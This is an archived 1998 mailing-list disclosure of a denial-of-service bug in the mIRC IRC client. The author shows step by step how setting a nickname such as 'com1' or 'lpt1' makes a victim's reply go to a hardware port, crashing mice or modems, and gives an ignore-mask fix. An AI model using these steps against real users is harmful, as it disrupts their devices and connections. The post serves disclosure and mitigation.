another "Old school DoS"

From: James WorK (jwkat_private)
Date: Mon Sep 28 1998 - 11:42:55 PDT

    Since the subject of the day is modem DoS attacks, you may consider another
    well-known irc "DoS attack" that has been ignored by client developers till
    now.

    Here we go:

    The bug refers to mIRC client (http://www.mirc.co.uk) but it was reported
    to work on virc client as well (virc users confirm?):

    /nick com1
    /msg victim hey man!

    <victim> yes?

    victim replies to you and *wh00p*

    <victim> damn...my mouse locked!

    /nick com2
    /msg victim are you gonna answer me or ?

    few moments later...

    /msg victim are you there?
    error : victim is not on irc

    after a while...

    <victim_> hey! I'm back...I just got disconnected.

    Apparently if you /msg com1 or any other serial port (com2, com3, com4) or
    parallel port (lpt1, lpt2) or logic port (aux) etc...the message is sent
    directly to the port as well, which usually leads to crash of the plugged
    device (modem, mouse, printer, etc..).

    Some people using particular phone devices (multiple lines switch and
    sorta) had to reset them because phoneline was completely messed up after
    the DoS.

    a quick-fix is setting com1!*@* com2!*@* etc as complete ignore. That way
    you won't be prompted to answer to nasty kiddies :-)

    Thanx to alex, raptor, awgn, and all DisLESSici (http://www.dislessici.org)
    for letting me crash your devices as didattical purpose.

    Send your flames to: jwk.lucian.net:9

    James WorK, jwkat_private
    member of [The Warlords] on IRCNet and conflict on EFNet
    team of lucian.net shells provider - buy shell\web\mail accounts with best
    service at http://www.lucian.net.